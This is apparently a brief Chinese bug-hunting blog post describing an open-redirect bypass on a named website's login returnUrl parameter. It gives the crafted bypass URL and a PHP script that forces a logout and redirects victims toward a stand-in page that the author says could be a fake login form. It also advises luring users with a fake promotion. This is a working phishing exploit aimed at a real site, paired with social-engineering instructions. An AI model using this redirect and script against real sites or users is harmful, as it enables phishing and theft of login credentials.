@1kbfree
2018-08-22T11:28:11.000000Z
字数 664
阅读 1263
漏洞挖掘
1、打开Url:https://www.5djbb.com/login?returnUrl=https://www.5djbb.com/site/index.html
2、因为这里是存在了验证的,但是不严谨,导致可以绕过,绕过的链接如下
https://www.5djbb.com/login?returnUrl=http://www.baidu.com/?https://www.5djbb.com/
3、因为这个是要在没有登陆的情况下才可以,那么要写一个简单的脚本发送给用户,然后利用社工说这网站某某某处有什么活动可以领取什么,让他点开登陆(就算是登陆了还要重新登陆的话普通用户也不会发现有什么异常~),脚本如下
<?php
header( "Location:http://www.5djbb.com/site/logout" ); // 退出的链接
header( "Location:https://www.5djbb.com/login.html?returnUrl=http://www.baidu.com/?https://shop.5djbb.com//member" ); // 然后跳转到www.baidu.com,假设这是一个模仿登陆的界面,那么就可以实现钓鱼
?>
4、然后打开脚本后会跳转到https://www.5djbb.com/login.html?returnUrl=http://www.baidu.com/?https://shop.5djbb.com//member
,然后登陆一下